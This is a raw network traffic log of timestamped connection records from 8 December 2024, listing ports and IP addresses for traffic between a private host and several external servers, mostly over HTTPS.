Dec 8, 2024 13:31:28.481962919 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.485296011 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.485387087 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.485397100 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.494477987 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.494528055 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.494534969 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.494546890 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.494584084 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.496143103 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.496664047 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.496722937 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.497008085 CET	49763	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:28.497025967 CET	443	49763	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:28.503973007 CET	443	49770	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.504476070 CET	49770	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.504502058 CET	443	49770	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.504971981 CET	49770	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.504981041 CET	443	49770	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.517189980 CET	443	49771	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.518979073 CET	49771	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.519000053 CET	443	49771	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.519661903 CET	49771	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.519666910 CET	443	49771	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.565608025 CET	443	49756	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.565654993 CET	443	49756	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.565715075 CET	49756	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.565915108 CET	49756	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.565934896 CET	443	49756	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.565942049 CET	49756	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.565948009 CET	443	49756	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.570087910 CET	49775	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.570126057 CET	443	49775	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.570194960 CET	49775	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.571789026 CET	49775	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.571805000 CET	443	49775	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.766000032 CET	443	49769	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.766057014 CET	443	49769	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.766170025 CET	49769	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.766463995 CET	49769	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.766480923 CET	443	49769	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.769622087 CET	49779	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.769655943 CET	443	49779	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.769737005 CET	49779	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.770076990 CET	49779	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.770088911 CET	443	49779	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.939702988 CET	443	49770	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.939775944 CET	443	49770	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.939826965 CET	49770	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.940018892 CET	49770	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.940030098 CET	443	49770	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.940040112 CET	49770	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.940047026 CET	443	49770	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.942675114 CET	49781	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.942714930 CET	443	49781	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.942989111 CET	49781	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.943175077 CET	49781	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.943186998 CET	443	49781	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.952584982 CET	443	49771	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.952645063 CET	443	49771	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.952718019 CET	49771	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.952816963 CET	49771	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.952831984 CET	443	49771	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.952842951 CET	49771	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.952847958 CET	443	49771	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.954938889 CET	49782	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.954972029 CET	443	49782	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:28.955045938 CET	49782	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.955162048 CET	49782	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:28.955176115 CET	443	49782	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:29.282524109 CET	49783	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:29.282582045 CET	443	49783	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:29.282696009 CET	49783	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:29.282947063 CET	49783	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:29.282977104 CET	443	49783	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:29.527662039 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:29.527734995 CET	49774	443	192.168.2.6	20.12.23.50
Dec 8, 2024 13:31:29.529609919 CET	49774	443	192.168.2.6	20.12.23.50
Dec 8, 2024 13:31:29.529616117 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:29.529850960 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:29.579605103 CET	49774	443	192.168.2.6	20.12.23.50
Dec 8, 2024 13:31:29.590193987 CET	49774	443	192.168.2.6	20.12.23.50
Dec 8, 2024 13:31:29.622179985 CET	443	49773	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:29.622562885 CET	49773	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:29.622586012 CET	443	49773	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:29.622966051 CET	49773	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:29.622972012 CET	443	49773	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:29.631334066 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:29.884370089 CET	49786	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:29.884413004 CET	443	49786	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:29.884506941 CET	49786	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:29.886142969 CET	49786	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:29.886157990 CET	443	49786	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:30.057079077 CET	443	49773	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.057147026 CET	443	49773	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.057235003 CET	49773	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.060265064 CET	49773	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.060281992 CET	443	49773	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.063895941 CET	49787	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.063934088 CET	443	49787	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.064044952 CET	49787	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.065454960 CET	49787	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.065469027 CET	443	49787	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.158005953 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:30.158030987 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:30.158039093 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:30.158049107 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:30.158070087 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:30.158116102 CET	49774	443	192.168.2.6	20.12.23.50
Dec 8, 2024 13:31:30.158130884 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:30.158147097 CET	49774	443	192.168.2.6	20.12.23.50
Dec 8, 2024 13:31:30.158175945 CET	49774	443	192.168.2.6	20.12.23.50
Dec 8, 2024 13:31:30.178569078 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:30.178653955 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:30.178677082 CET	49774	443	192.168.2.6	20.12.23.50
Dec 8, 2024 13:31:30.178718090 CET	49774	443	192.168.2.6	20.12.23.50
Dec 8, 2024 13:31:30.179531097 CET	49774	443	192.168.2.6	20.12.23.50
Dec 8, 2024 13:31:30.179554939 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:30.179585934 CET	49774	443	192.168.2.6	20.12.23.50
Dec 8, 2024 13:31:30.179593086 CET	443	49774	20.12.23.50	192.168.2.6
Dec 8, 2024 13:31:30.291183949 CET	443	49775	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.291631937 CET	49775	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.291656017 CET	443	49775	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.292078972 CET	49775	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.292084932 CET	443	49775	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.488749981 CET	443	49779	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.489280939 CET	49779	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.489310026 CET	443	49779	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.489732981 CET	49779	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.489737988 CET	443	49779	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.658329964 CET	443	49781	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.659177065 CET	49781	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.659197092 CET	443	49781	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.659626961 CET	49781	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.659631014 CET	443	49781	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.675694942 CET	443	49782	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.676083088 CET	49782	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.676105976 CET	443	49782	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.676575899 CET	49782	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.676582098 CET	443	49782	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.725581884 CET	443	49775	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.725644112 CET	443	49775	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.725770950 CET	49775	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.725984097 CET	49775	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.726000071 CET	443	49775	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.729211092 CET	49788	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.729244947 CET	443	49788	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.729336023 CET	49788	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.729537010 CET	49788	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.729551077 CET	443	49788	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.825351000 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:30.825773954 CET	49791	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:30.923129082 CET	443	49779	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.923187971 CET	443	49779	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.923440933 CET	49779	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.923440933 CET	49779	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.923476934 CET	49779	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.923491955 CET	443	49779	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.926392078 CET	49792	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.926415920 CET	443	49792	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.926482916 CET	49792	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.926629066 CET	49792	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:30.926640034 CET	443	49792	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:30.947127104 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:30.947149038 CET	80	49791	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:30.947246075 CET	49791	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:30.947470903 CET	49791	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:30.975302935 CET	443	49783	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:30.975636959 CET	49783	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:30.975651026 CET	443	49783	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:30.975975037 CET	443	49783	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:30.976421118 CET	49783	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:30.976485014 CET	443	49783	172.217.21.36	192.168.2.6
Dec 8, 2024 13:31:31.031596899 CET	49783	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:31.067785025 CET	80	49791	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:31.095333099 CET	443	49781	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:31.095402956 CET	443	49781	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:31.095789909 CET	49781	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:31.095889091 CET	49781	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:31.095889091 CET	49781	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:31.095905066 CET	443	49781	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:31.095912933 CET	443	49781	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:31.108547926 CET	49793	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:31.108586073 CET	443	49793	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:31.112256050 CET	49793	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:31.112287045 CET	443	49782	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:31.112333059 CET	443	49782	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:31.112766981 CET	49782	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:31.114892006 CET	49793	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:31.114913940 CET	443	49793	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:31.115194082 CET	49782	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:31.115194082 CET	49782	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:31.115214109 CET	443	49782	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:31.115221024 CET	443	49782	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:31.117752075 CET	49794	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:31.117791891 CET	443	49794	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:31.117969036 CET	49794	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:31.119914055 CET	49794	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:31.119931936 CET	443	49794	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:31.269431114 CET	443	49786	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:31.269555092 CET	49786	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:31.271423101 CET	49786	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:31.271435976 CET	443	49786	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:31.271661997 CET	443	49786	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:31.309426069 CET	49786	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:31.351331949 CET	443	49786	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:31.781507969 CET	443	49787	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:31.782392025 CET	49787	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:31.782407045 CET	443	49787	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:31.783180952 CET	443	49786	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:31.783210993 CET	49787	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:31.783216953 CET	443	49787	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:31.783238888 CET	443	49786	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:31.783332109 CET	49786	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:31.783386946 CET	49786	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:31.783386946 CET	49786	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:31.783405066 CET	443	49786	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:31.783412933 CET	443	49786	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:31.860722065 CET	49795	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:31.860764980 CET	443	49795	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:31.860840082 CET	49795	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:31.861124992 CET	49795	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:31.861140013 CET	443	49795	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:31.974455118 CET	49796	443	192.168.2.6	142.250.181.142
Dec 8, 2024 13:31:31.974502087 CET	443	49796	142.250.181.142	192.168.2.6
Dec 8, 2024 13:31:31.974572897 CET	49796	443	192.168.2.6	142.250.181.142
Dec 8, 2024 13:31:31.974844933 CET	49796	443	192.168.2.6	142.250.181.142
Dec 8, 2024 13:31:31.974858046 CET	443	49796	142.250.181.142	192.168.2.6
Dec 8, 2024 13:31:31.996504068 CET	49798	443	192.168.2.6	172.217.17.78
Dec 8, 2024 13:31:31.996537924 CET	443	49798	172.217.17.78	192.168.2.6
Dec 8, 2024 13:31:31.996603012 CET	49798	443	192.168.2.6	172.217.17.78
Dec 8, 2024 13:31:31.996756077 CET	49798	443	192.168.2.6	172.217.17.78
Dec 8, 2024 13:31:31.996769905 CET	443	49798	172.217.17.78	192.168.2.6
Dec 8, 2024 13:31:32.217731953 CET	443	49787	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.217793941 CET	443	49787	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.217937946 CET	49787	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.218043089 CET	49787	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.218058109 CET	443	49787	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.218080997 CET	49787	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.218090057 CET	443	49787	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.221411943 CET	49799	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.221442938 CET	443	49799	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.221534967 CET	49799	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.221709967 CET	49799	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.221725941 CET	443	49799	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.446094036 CET	443	49788	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.446656942 CET	49788	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.446675062 CET	443	49788	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.447298050 CET	49788	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.447304010 CET	443	49788	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.645806074 CET	443	49792	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.646300077 CET	49792	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.646320105 CET	443	49792	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.646739960 CET	49792	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.646744013 CET	443	49792	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.798439980 CET	80	49791	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:32.798557043 CET	49791	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:32.831085920 CET	443	49793	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.834949970 CET	49793	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.834965944 CET	443	49793	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.835525036 CET	49793	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.835530996 CET	443	49793	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.837719917 CET	443	49794	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.838068962 CET	49794	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.838093042 CET	443	49794	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.838534117 CET	49794	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.838538885 CET	443	49794	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.878448963 CET	49798	443	192.168.2.6	172.217.17.78
Dec 8, 2024 13:31:32.878703117 CET	49796	443	192.168.2.6	142.250.181.142
Dec 8, 2024 13:31:32.878853083 CET	49783	443	192.168.2.6	172.217.21.36
Dec 8, 2024 13:31:32.884063005 CET	443	49788	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.884119987 CET	443	49788	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.884207010 CET	49788	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.884370089 CET	49788	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.884387016 CET	443	49788	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.884397984 CET	49788	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.884402990 CET	443	49788	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.887273073 CET	49800	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.887304068 CET	443	49800	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.887453079 CET	49800	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.887672901 CET	49800	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:32.887681961 CET	443	49800	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:32.905503035 CET	49791	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:33.025203943 CET	80	49791	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:33.108454943 CET	443	49792	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.108510017 CET	443	49792	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.108716011 CET	49792	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.108756065 CET	49792	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.108772039 CET	443	49792	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.108787060 CET	49792	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.108793974 CET	443	49792	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.111792088 CET	49801	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.111831903 CET	443	49801	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.111932039 CET	49801	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.112232924 CET	49801	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.112243891 CET	443	49801	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.241461992 CET	443	49795	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:33.241543055 CET	49795	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:33.242753983 CET	49795	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:33.242763996 CET	443	49795	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:33.243017912 CET	443	49795	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:33.244129896 CET	49795	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:33.267437935 CET	443	49793	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.267498016 CET	443	49793	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.267683029 CET	49793	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.267709017 CET	49793	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.267723083 CET	443	49793	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.267734051 CET	49793	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.267740011 CET	443	49793	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.270502090 CET	49802	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.270534992 CET	443	49802	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.270684958 CET	49802	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.270828962 CET	49802	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.270839930 CET	443	49802	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.274935961 CET	443	49794	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.274993896 CET	443	49794	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.275135994 CET	49794	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.275194883 CET	49794	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.275213003 CET	443	49794	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.275223017 CET	49794	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.275228024 CET	443	49794	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.277338982 CET	49803	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.277358055 CET	443	49803	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.277482033 CET	49803	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.277606964 CET	49803	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.277616978 CET	443	49803	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.287358999 CET	443	49795	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:33.759556055 CET	443	49795	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:33.759632111 CET	443	49795	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:33.759722948 CET	49795	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:33.760416985 CET	49795	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:33.760433912 CET	443	49795	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:33.760442972 CET	49795	443	192.168.2.6	23.218.208.109
Dec 8, 2024 13:31:33.760447979 CET	443	49795	23.218.208.109	192.168.2.6
Dec 8, 2024 13:31:33.844189882 CET	80	49791	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:33.844343901 CET	49791	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:33.934437037 CET	443	49799	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.950829029 CET	49799	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:33.950841904 CET	443	49799	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:33.951268911 CET	49799	443	192.168.2.6	13.107.246.63
